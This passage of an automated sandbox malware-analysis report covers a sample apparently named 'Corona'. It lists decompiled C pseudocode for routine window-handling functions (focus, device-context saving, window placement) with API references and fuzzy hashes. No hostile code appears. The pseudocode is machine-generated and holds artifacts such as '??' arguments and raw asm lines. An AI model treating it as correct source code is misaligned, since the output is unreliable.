                                  0x004423a5
                                  0x004423a5
                                  0x004423c4
                                  0x004423c8
                                  0x00000000
                                  0x00000000
                                  0x0044245e
                                  0x0044245f
                                  0x0044245f
                                  0x00442460
                                  0x00000000
                                  0x00442466
                                  0x00000000
                                  0x00442466
                                  0x00000000
                                  0x00442460
                                  0x004423e0
                                  0x004423e5
                                  0x004423e7
                                  0x004423ee
                                  0x004423f9
                                  0x004423fb
                                  0x004423fb
                                  0x00442400
                                  0x00442408
                                  0x0044240b
                                  0x0044240d
                                  0x00442413
                                  0x00442415
                                  0x0044241c
                                  0x0044241c
                                  0x00442422
                                  0x00442428
                                  0x0044242f
                                  0x0044244b
                                  0x00442454
                                  0x00442431
                                  0x00442441
                                  0x00442441
                                  0x0044242f
                                  0x0044240d
                                  0x00442241
                                  0x004426ff
                                  0x00442702
                                  0x00442706
                                  0x00442709
                                  0x0044270d
                                  0x00442710
                                  0x00442711
                                  0x00442716
                                  0x00442716
                                  0x00442719
                                  0x0044271b
                                  0x0044271e
                                  0x00442721
                                  0x0044272e
                                  0x0044272e
                                  0x00442232
                                  0x0044222b
                                  0x00442226
                                  0x00000000

                                  APIs
                                  • SaveDC.GDI32(?), ref: 004424CB
                                  • RestoreDC.GDI32(?,?), ref: 0044253F
                                  • 72E7B080.USER32(?,00000000,0044272F), ref: 004425B9
                                  • SaveDC.GDI32(?), ref: 004425F0
                                  • RestoreDC.GDI32(?,?), ref: 0044265D
                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044272F), ref: 00442711
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: RestoreSave$B080NtdllProc_Window
                                  • String ID:
                                  • API String ID: 4024241980-0
                                  • Opcode ID: 248aab9645699cb887edc6df762108ab4af923a67125c494b005b0ac249ed158
                                  • Instruction ID: edc1d04ca6091e2f80cee404feeb526d46385273312ca3e62fa202349d07fd40
                                  • Opcode Fuzzy Hash: 248aab9645699cb887edc6df762108ab4af923a67125c494b005b0ac249ed158
                                  • Instruction Fuzzy Hash: 0BE15E34A006059FEB10DFAAC58199EF7F5FF48304B6185AAF801A7365C7B8ED41CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004473A0, Relevance: 9.3, APIs: 6, Instructions: 284windowCOMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E004473A0(intOrPtr __eax, struct HWND__** __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				struct HWND__* _v24;
				void* __ebp;
				struct HWND__* _t92;
				intOrPtr _t112;
				intOrPtr _t115;
				struct HWND__* _t121;
				struct HWND__* _t124;
				intOrPtr _t128;
				struct HWND__* _t129;
				intOrPtr _t130;
				intOrPtr _t131;
				struct HWND__* _t133;
				struct HWND__* _t136;
				intOrPtr _t142;
				intOrPtr _t172;
				struct HDC__* _t177;
				struct HWND__** _t200;
				struct HWND__* _t218;
				struct HWND__* _t219;
				intOrPtr _t228;
				void* _t230;
				void* _t231;
				intOrPtr _t237;
				intOrPtr _t245;
				struct HWND__* _t249;
				struct HWND__* _t250;
				struct HWND__* _t255;
				struct HWND__* _t256;
				void* _t258;
				void* _t260;
				intOrPtr _t261;
				void* _t263;
				void* _t267;

				_t258 = _t260;
				_t261 = _t260 + 0xffffffec;
				_t200 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t218 = _t92;
				_t263 = _t218 - 0x46;
				if(_t263 > 0) {
					_t219 = _t218 - 0xb01a;
					__eflags = _t219;
					if(_t219 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E004032F8(_v8, __eflags);
						}
					} else {
						__eflags = _t219 == 1;
						if(_t219 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E004032F8(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t263 == 0) {
						_t112 = _v8;
						_t228 =  *0x4477d4; // 0x1
						__eflags = _t228 - ( *(_t112 + 0x1c) &  *0x4477d0);
						if(_t228 == ( *(_t112 + 0x1c) &  *0x4477d0)) {
							_t115 = _v8;
							__eflags =  *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff < 0) {
								_t128 = _v8;
								__eflags =  *((char*)(_t128 + 0x22b)) - 2;
								if( *((char*)(_t128 + 0x22b)) != 2) {
									_t129 = __edx[2];
									_t26 = _t129 + 0x18;
									 *_t26 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t121 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t121;
							if(_t121 == 0) {
								L30:
								_t124 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t124;
								if(_t124 == 0) {
									L32:
									 *( *((intOrPtr*)(_t200 + 8)) + 0x18) =  *( *((intOrPtr*)(_t200 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t124 == 3;
									if(_t124 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t121 == 2;
								if(_t121 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t230 = _t218 + 0xfffffffa - 3;
						if(_t230 < 0) {
							__eflags =  *0x450c20;
							if( *0x450c20 != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t130 = _v8;
									__eflags =  *(_t130 + 0x1c) & 0x00000010;
									if(( *(_t130 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t255 = 0;
										_t131 = _v8;
										__eflags =  *((char*)(_t131 + 0x22f)) - 2;
										if( *((char*)(_t131 + 0x22f)) != 2) {
											_t133 =  *(_v8 + 0x220);
											__eflags = _t133;
											if(_t133 != 0) {
												__eflags = _t133 - _v8;
												if(_t133 != _v8) {
													_t255 = E00434EF4(_t133);
												}
											}
										} else {
											_t136 = E00447CCC(_v8);
											__eflags = _t136;
											if(_t136 != 0) {
												_t255 = E00434EF4(E00447CCC(_v8));
											}
										}
										__eflags = _t255;
										if(_t255 == 0) {
											goto L43;
										} else {
											_t92 = SetFocus(_t255);
										}
									}
								}
							}
							goto L44;
						} else {
							_t231 = _t230 - 0x22;
							if(_t231 == 0) {
								_v24 = __edx[2];
								__eflags = _v24->i - 1;
								if(_v24->i != 1) {
									goto L43;
								} else {
									_t142 = _v8;
									__eflags =  *(_t142 + 0x248);
									if( *(_t142 + 0x248) == 0) {
										goto L43;
									} else {
										_t249 = E004414EC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t249;
										if(_t249 == 0) {
											goto L43;
										} else {
											_v16 = E0041CD48(0, 1);
											_push(_t258);
											_push(0x447619);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t258);
											_push(0x4475fc);
											_push( *[fs:eax]);
											 *[fs:eax] = _t261;
											E0041D34C(_v16,  *(_v24 + 0x18));
											E0041D1EC(_v16);
											E004429D4(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t237);
											 *[fs:eax] = _t237;
											_push(0x447603);
											__eflags = 0;
											E0041D34C(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t231 == 1) {
									_t256 = __edx[2];
									__eflags = _t256->i - 1;
									if(_t256->i != 1) {
										goto L43;
									} else {
										_t172 = _v8;
										__eflags =  *(_t172 + 0x248);
										if( *(_t172 + 0x248) == 0) {
											goto L43;
										} else {
											_t250 = E004414EC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
											__eflags = _t250;
											if(_t250 == 0) {
												goto L43;
											} else {
												_t177 = E00434EF4(_v8);
												L00406484();
												_v20 = _t177;
												 *[fs:eax] = _t261;
												_v16 = E0041CD48(0, 1);
												 *[fs:eax] = _t261;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t261;
												E0041D34C(_v16, _v20);
												E0041D1EC(_v16);
												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x447703, _t258,  *[fs:eax], 0x447720, _t258,  *[fs:eax], 0x447747, _t258, _t177);
												_pop(_t245);
												 *[fs:eax] = _t245;
												_push(0x44770a);
												__eflags = 0;
												E0041D34C(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t267 = _t92 -  *0x452bbc; // 0xc075
									if(_t267 == 0) {
										E0042F98C(_v8, 0, 0xb025, 0);
										E0042F98C(_v8, 0, 0xb024, 0);
										E0042F98C(_v8, 0, 0xb035, 0);
										E0042F98C(_v8, 0, 0xb009, 0);
										E0042F98C(_v8, 0, 0xb008, 0);
										E0042F98C(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t92 = E00432908(_v8, _t200);
									L44:
									return _t92;
								}
							}
						}
					}
				}
			}








































                                  0x004473a1
                                  0x004473a3
                                  0x004473a9
                                  0x004473ab
                                  0x004473ae
                                  0x004473b0
                                  0x004473b2
                                  0x004473b5
                                  0x004473da
                                  0x004473da
                                  0x004473e0
                                  0x0044748c
                                  0x00447493
                                  0x004474a0
                                  0x004474a0
                                  0x004473e6
                                  0x004473e6
                                  0x004473e7
                                  0x0044746b
                                  0x00447472
                                  0x0044747f
                                  0x0044747f
                                  0x004473e9
                                  0x00000000
                                  0x004473e9
                                  0x004473e7
                                  0x00000000
                                  0x004473b7
                                  0x004473b7
                                  0x004474aa
                                  0x004474b8
                                  0x004474bf
                                  0x004474c2
                                  0x004474c8
                                  0x004474d2
                                  0x004474d4
                                  0x004474d6
                                  0x004474d9
                                  0x004474e0
                                  0x004474e2
                                  0x004474e5
                                  0x004474e5
                                  0x004474e5
                                  0x004474e5
                                  0x004474e0
                                  0x004474f2
                                  0x004474f2
                                  0x004474f4
                                  0x004474fe
                                  0x00447507
                                  0x00447507
                                  0x00447509
                                  0x00447513
                                  0x00447516
                                  0x0044750b
                                  0x0044750b
                                  0x0044750d
                                  0x00000000
                                  0x00000000
                                  0x0044750d
                                  0x004474f6
                                  0x004474f6
                                  0x004474f8
                                  0x00000000
                                  0x00000000
                                  0x004474f8
                                  0x004474f4
                                  0x00000000
                                  0x004473bd
                                  0x004473c0
                                  0x004473c3
                                  0x004473ee
                                  0x004473f5
                                  0x004473fb
                                  0x004473fe
                                  0x00000000
                                  0x00447404
                                  0x00447404
                                  0x00447407
                                  0x0044740b
                                  0x00000000
                                  0x00447411
                                  0x00447411
                                  0x00447413
                                  0x00447416
                                  0x0044741d
                                  0x0044743f
                                  0x00447445
                                  0x00447447
                                  0x00447449
                                  0x0044744c
                                  0x00447453
                                  0x00447453
                                  0x0044744c
                                  0x0044741f
                                  0x00447422
                                  0x00447427
                                  0x00447429
                                  0x00447438
                                  0x00447438
                                  0x00447429
                                  0x00447455
                                  0x00447457
                                  0x00000000
                                  0x0044745d
                                  0x0044745e
                                  0x0044745e
                                  0x00447457
                                  0x0044740b
                                  0x004473fe
                                  0x00000000
                                  0x004473c5
                                  0x004473c5
                                  0x004473c8
                                  0x00447522
                                  0x00447528
                                  0x0044752b
                                  0x00000000
                                  0x00447531
                                  0x00447531
                                  0x00447534
                                  0x0044753b
                                  0x00000000
                                  0x00447541
                                  0x00447557
                                  0x00447559
                                  0x0044755b
                                  0x00000000
                                  0x00447561
                                  0x0044756d
                                  0x00447572
                                  0x00447573
                                  0x00447578
                                  0x0044757b
                                  0x0044758a
                                  0x0044758f
                                  0x00447590
                                  0x00447595
                                  0x00447598
                                  0x004475a4
                                  0x004475b7
                                  0x004475cf
                                  0x004475d6
                                  0x004475d9
                                  0x004475dc
                                  0x004475e1
                                  0x004475e6
                                  0x004475fb
                                  0x004475fb
                                  0x0044755b
                                  0x0044753b
                                  0x004473ce
                                  0x004473cf
                                  0x00447620
                                  0x00447623
                                  0x00447626
                                  0x00000000
                                  0x0044762c
                                  0x0044762c
                                  0x0044762f
                                  0x00447636
                                  0x00000000
                                  0x0044763c
                                  0x0044764f
                                  0x00447651
                                  0x00447653
                                  0x00000000
                                  0x00447659
                                  0x0044765c
                                  0x00447662
                                  0x00447667
                                  0x00447675
                                  0x00447684
                                  0x00447692
                                  0x0044769e
                                  0x004476ac
                                  0x004476b5
                                  0x004476c8
                                  0x004476db
                                  0x004476e0
                                  0x004476e3
                                  0x004476e6
                                  0x004476eb
                                  0x004476f0
                                  0x00447702
                                  0x00447702
                                  0x00447653
                                  0x00447636
                                  0x004473d5
                                  0x0044774e
                                  0x0044774e
                                  0x00447754
                                  0x00447762
                                  0x00447773
                                  0x00447784
                                  0x00447795
                                  0x004477a6
                                  0x004477b7
                                  0x004477b7
                                  0x004477bc
                                  0x004477c1
                                  0x004477c6
                                  0x004477cc
                                  0x004477cc
                                  0x004473cf
                                  0x004473c8
                                  0x004473c3
                                  0x004473b7

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: RestoreSave$B080Focus
                                  • String ID:
                                  • API String ID: 809140284-0
                                  • Opcode ID: 9e5d8527c3b7fc5048a8820b339ea4baaa03bef5cdb50cfec420b4c4a6d0b5fc
                                  • Instruction ID: 4d7df4f1f8f5a44da635d72099b31af43b60ad2639d384f672acc3bf9dbbf1cb
                                  • Opcode Fuzzy Hash: 9e5d8527c3b7fc5048a8820b339ea4baaa03bef5cdb50cfec420b4c4a6d0b5fc
                                  • Instruction Fuzzy Hash: 19B1A434A04104EFDB11DF69C986AAEB7F5EB49304FA544BAF414DB351C738AE42CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044D700, Relevance: 9.1, APIs: 6, Instructions: 86windownativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E0044D700(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E0044C668( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E00434EF4( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L00406294();
						}
					}
					_t26 =  *0x450e7c; // 0x4528f8
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x450e7c; // 0x4528f8
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E00448374(_t36, 0);
						E0044A790( *((intOrPtr*)(_t51 + 0x44)));
					}
					E0044CD48(_t51);
					_t21 =  *0x452bb4; // 0x2131320
					_t55 =  *((intOrPtr*)(_t21 + 0x64));
					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
						_t21 = SetFocus(E00434EF4(_t55));
					}
					if( *((short*)(_t51 + 0x122)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x120))();
					}
				}
				return _t21;
			}











                                  0x0044d702
                                  0x0044d708
                                  0x0044d70f
                                  0x0044d719
                                  0x0044d722
                                  0x0044d75c
                                  0x0044d764
                                  0x0044d733
                                  0x0044d741
                                  0x0044d743
                                  0x00000000
                                  0x0044d745
                                  0x0044d745
                                  0x0044d747
                                  0x0044d74c
                                  0x0044d754
                                  0x0044d755
                                  0x0044d755
                                  0x0044d743
                                  0x0044d771
                                  0x0044d77a
                                  0x0044d77c
                                  0x0044d77e
                                  0x0044d77e
                                  0x0044d784
                                  0x0044d78d
                                  0x0044d78f
                                  0x0044d791
                                  0x0044d791
                                  0x0044d79b
                                  0x0044d7a0
                                  0x0044d7a5
                                  0x0044d7b8
                                  0x0044d7c0
                                  0x0044d7c0
                                  0x0044d7c7
                                  0x0044d7cc
                                  0x0044d7d1
                                  0x0044d7d6
                                  0x0044d7e0
                                  0x0044d7e0
                                  0x0044d7ed
                                  0x00000000
                                  0x0044d7f7
                                  0x0044d7ed
                                  0x0044d7ff

                                  APIs
                                  • IsIconic.USER32 ref: 0044D708
                                  • SetActiveWindow.USER32(?,?,?,?,0044D129,00000000,0044D5EA), ref: 0044D719
                                  • IsWindowEnabled.USER32(00000000), ref: 0044D73C
                                  • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,0044D129,00000000,0044D5EA), ref: 0044D755
                                  • SetWindowPos.USER32(?,00000000,00000000,?,?,0044D129,00000000,0044D5EA), ref: 0044D79B
                                  • SetFocus.USER32(00000000,?,00000000,00000000,?,?,0044D129,00000000,0044D5EA), ref: 0044D7E0
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                  • String ID:
                                  • API String ID: 3996302123-0
                                  • Opcode ID: a16b760ae94434b04022004084b0f6596c65f1df00944d32fc5a4de108a3ffc9
                                  • Instruction ID: 918a6c987cfd56faad6950451867ad2e51d243e2933107cfe1e5344e1d6f4fb7
                                  • Opcode Fuzzy Hash: a16b760ae94434b04022004084b0f6596c65f1df00944d32fc5a4de108a3ffc9
                                  • Instruction Fuzzy Hash: 0431DF75B002409BFB25AF69CD86B5637A8AB09704F0904BAB900DF2D7DA7DEC40871D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004348E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E004348E0(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E00435154(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E00435154(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E0042E194(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E0042DE48(_t52);
						return E004032F8(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}












                                  0x004348e9
                                  0x004348eb
                                  0x004348ed
                                  0x004348f2
                                  0x0043490d
                                  0x00434916
                                  0x00434944
                                  0x00434944
                                  0x00434947
                                  0x0043494d
                                  0x00434953
                                  0x00434958
                                  0x0043495d
                                  0x0043495f
                                  0x00434961
                                  0x00434973
                                  0x0043497d
                                  0x00434988
                                  0x00434989
                                  0x0043498a
                                  0x0043498b
                                  0x00434997
                                  0x00434997
                                  0x0043499c
                                  0x0043499e
                                  0x00000000
                                  0x004349a9
                                  0x0043491f
                                  0x00434924
                                  0x00434926
                                  0x00000000
                                  0x00000000
                                  0x0043493d
                                  0x00000000
                                  0x00434901
                                  0x00434901
                                  0x00434907
                                  0x004349b4
                                  0x004349b4
                                  0x00000000
                                  0x00434907

                                  APIs
                                  • IsIconic.USER32 ref: 0043491F
                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043493D
                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00434973
                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00434997
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$Placement$Iconic
                                  • String ID: ,
                                  • API String ID: 568898626-3772416878
                                  • Opcode ID: 0d7a5fd8f8b9938bcd41b9888540019158a4420273bc2e43066675ea362c8ca3
                                  • Instruction ID: 75f4f6da7f127a85353d24d424ad45a40a3a9b02b649dcb1d2e9dfbbfb710552
                                  • Opcode Fuzzy Hash: 0d7a5fd8f8b9938bcd41b9888540019158a4420273bc2e43066675ea362c8ca3
                                  • Instruction Fuzzy Hash: E7213171A00108ABCF54EFA9C8C1ADB77A8AF4D314F04957AFD14EF346D679E9048B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042397C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0042397C(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x452921 != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E004238EC( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				 *0x4528fc = E0042377C(1, _t19,  *0x4528fc, __edi, _t23);
				return  *0x4528fc(_t23, _t19);
			}









                                  0x00423984
                                  0x00423987
                                  0x00423991
                                  0x004239bb
                                  0x004239cc
                                  0x004239df
                                  0x004239ce
                                  0x004239d3
                                  0x004239d3
                                  0x00000000
                                  0x004239e9
                                  0x00000000
                                  0x004239bd
                                  0x004239a5
                                  0x00000000

                                  APIs
                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  • MonitorFromWindow.USER32(?,?), ref: 004239AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AddressFromMonitorProcWindow
                                  • String ID: MonitorFromWindow
                                  • API String ID: 2184870004-2842599566
                                  • Opcode ID: 7cf7a69c5bf5c815999e72160732fef235a375ebba1c9548b5a6ec298b642f06
                                  • Instruction ID: ec62e6e023166cc2784e69140f7ce9fd6cb5baf1267b185c6a9d8d5770aff9fb
                                  • Opcode Fuzzy Hash: 7cf7a69c5bf5c815999e72160732fef235a375ebba1c9548b5a6ec298b642f06
                                  • Instruction Fuzzy Hash: 1301A7A27002285A8700EF95AC429BF73BC9B07306B804037F81197242D77DDF4197BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044D650, Relevance: 7.6, APIs: 5, Instructions: 59nativewindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0044D650(void* __eax) {
				int _t21;
				struct HWND__* _t36;
				void* _t40;

				_t40 = __eax;
				_t1 = _t40 + 0x30; // 0x0
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E0044CD38();
					_t2 = _t40 + 0x30; // 0x0
					SetActiveWindow( *_t2);
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E00434EF4( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t15 = _t40 + 0x30; // 0x0
						_t21 = E0044C668( *_t15, 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						_t36 = E00434EF4( *((intOrPtr*)(_t40 + 0x44)));
						_t13 = _t40 + 0x30; // 0x0
						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t40 + 0x30; // 0x0
						_t21 =  *_t14;
						_push(_t21);
						L00406294();
					}
					if( *((short*)(_t40 + 0x11a)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x118))();
					}
				}
				return _t21;
			}






                                  0x0044d652
                                  0x0044d654
                                  0x0044d658
                                  0x0044d65f
                                  0x0044d667
                                  0x0044d66c
                                  0x0044d670
                                  0x0044d679
                                  0x0044d6dd
                                  0x0044d6e0
                                  0x0044d69c
                                  0x0044d6a0
                                  0x0044d6b2
                                  0x0044d6b8
                                  0x0044d6bc
                                  0x0044d6c1
                                  0x0044d6c3
                                  0x0044d6c8
                                  0x0044d6cd
                                  0x0044d6cd
                                  0x0044d6d0
                                  0x0044d6d1
                                  0x0044d6d1
                                  0x0044d6ed
                                  0x00000000
                                  0x0044d6f7
                                  0x0044d6ed
                                  0x0044d6ff

                                  APIs
                                  • IsIconic.USER32 ref: 0044D658
                                  • SetActiveWindow.USER32(00000000,00000000,?,?,0044DCFC), ref: 0044D670
                                  • IsWindowEnabled.USER32(00000000), ref: 0044D693
                                  • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0044DCFC), ref: 0044D6BC
                                  • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 0044D6D1
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
